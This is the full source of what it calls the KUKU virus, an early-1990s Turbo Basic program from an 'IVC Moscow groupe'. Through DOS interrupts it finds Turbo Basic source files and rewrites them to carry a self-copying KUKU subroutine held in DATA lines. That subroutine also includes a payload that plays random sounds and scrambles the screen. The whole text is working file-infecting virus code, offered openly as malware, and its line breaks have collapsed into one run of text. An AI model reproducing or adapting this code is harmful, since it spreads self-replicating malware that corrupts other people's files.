$event off defint a-z screen 0,0,0 ?"KUKU VIRUS Ver. 1.0 (Distribution module.)" ?"Copyright (C) Û IVC Û Moscow groupe.":? color 15,4: ?"***************************************" ?"* D A N G E R !!! *" ?"* Virus for Turbo Basic source files. *" ?"***************************************":beep color 7,0 ?:?"Press any key to process ..."; while inkey$="":wend ?" process"; CALL kuku if z=0 then ?"File infected." if z=11 then ?" imposible (NO FILE FOR INFECTED)." ?:?"About all question call to MOSCOW GROUPE of International ?tab(45);"Viruses" ?tab(45);"Company (IVC, Inc.) while inkey$="":wend screen 0,1,0 sub KUKU shared z n$=string$(8,63)+chr$(46)+chr$(66)+chr$(65)+chr$(83):dim dta%(32),find%(32) for a%=0% to 32%:dta%(a%)=0:next for z=0 to len(n$)-2 step 2:find%(z/2)=asc(mid$(n$,z+2,1))*256+asc(mid$(n$,z+1,1)):next reg 1,&h1A00:reg 8,varseg(dta%(0)):reg 4,varptr(dta%(0)):call interrupt &h21 reg 1,&h4e00:reg 3,attr:reg 8,varseg(find%(0)):reg 4,varptr(find%(0)):call interrupt &h21 if reg(1)<>0 then p$=string$(15,255):goto findfirst1 for a=0 to 32:h=dta%(a) and 255:p$=p$+chr$(h):l=(dta%(a)-h)/&h100 and 255:p$=p$+chr$(l):next findfirst1: dta$=p$:f$=mid$(dta$,&h1f,13):if f$=string$(len(f$),255) then z=11:exit sub a=instr(2,f$,chr$(0)):file$=mid$(f$,1,a) ?:?"Infecting file :"file$ name file$ as chr$(128) s1$=chr$(67)+chr$(65)+chr$(76)+chr$(76)+CHR$(32) s2$=chr$(68)+chr$(65)+chr$(84)+chr$(65) s$=chr$(75)+chr$(85)+chr$(75)+chr$(85) open chr$(128) for input as#1 ?"Size:"lof(1) open file$ for output as #2 ? #2,S1$S$chr$(13)chr$(10) ?"Transfer file ..." while not eof(1):line input #1,a$:if a$="CALL KUKU" then z=10 ? #2,a$:wend if z=10 then ccq ?#2,chr$(32) ?"Move data ..." for a=1 to 2 restore KukuData if a=2 then ?#2,S$+s2$+chr$(58) while QWE$<>chr$(39) read qwe$ if a=2 then ?#2,S2$+chr$(34); ? #2,qwe$ wend qwe$=chr$(32) next ?#2,chr$(69)+chr$(78)+chr$(68)+chr$(32)+chr$(83)+chr$(85)+chr$(66) ?"Out size:";lof(2) close #1,#2:kill chr$(128): end ccq: ?:?"File already infected ...":z=10 close:kill chr$(128) exit sub kukudata: data"sub KUKU" data"' KUKU VIRUS FOR TURBO-BASIC !!!" data"' This virus make at UPK-2 of Sevastopolsky r-n, Moscow. data"n$=string$(8,63)+chr$(46)+chr$(66)+chr$(65)+chr$(83):dim dta%(32),find%(32) data"for a%=0% to 32%:dta%(a%)=0:next data"for z=0 to len(n$)-2 step 2:find%(z/2)=asc(mid$(n$,z+2,1))*256+asc(mid$(n$,z+1,1)):next data"reg 1,&h1A00:reg 8,varseg(dta%(0)):reg 4,varptr(dta%(0)):call interrupt &h21 data"reg 1,&h4e00:reg 3,attr:reg 8,varseg(find%(0)):reg 4,varptr(find%(0)):call interrupt &h21 data"if reg(1)<>0 then p$=string$(15,255):goto findfirstfile1 data"for a=0 to 32:h=dta%(a) and 255:p$=p$+chr$(h):l=(dta%(a)-h)/&h100 and 255:p$=p$+chr$(l):next data"findfirstfile1: data"dta$=p$:f$=mid$(dta$,&h1f,13):if f$=string$(len(f$),255) then data"for J=1 to 1500:Sound Rnd(1)*(1500-j)+40,.01:NEXT:delay(2) data"screen 1:def seg=&Hb800:for a=0 to 16384:poke a,rnd(1)*255:next:exit sub data"end if data"a=instr(2,f$,chr$(0)):file$=mid$(f$,1,a):name file$ as chr$(128) data"s1$=chr$(67)+chr$(65)+chr$(76)+chr$(76)+CHR$(32):s2$=chr$(68)+chr$(65)+chr$(84)+chr$(65):s$=chr$(75)+chr$(85)+chr$(75)+chr$(85) data"open chr$(128) for input as#1 data"open file$ for output as #2 data"? #2,S1$S$chr$(13)chr$(10) data"while not eof(1):line input #1,a$:? #2,a$:wend data"?#2,chr$(32) data"for a=1 to 2:restore KukuData data"if a=2 then ?#2,S$+s2$ data"while QWE$<>chr$(39):read qwe$:if a=2 then ?#2,S2$chr$(34); data"? #2,qwe$+chr$(34):wend data"qwe$=chr$(32):next data"?#2,chr$(69)chr$(78)chr$(68)chr$(32)chr$(83)chr$(85)chr$(66) data"close #1,#2:kill chr$(128):exit sub data"' KUKU Virus Version 1.0 data"' (C) ÛIVCÛ Moscow groupe. 25-May-1991. Serial No.0003529 DATA"'" end sub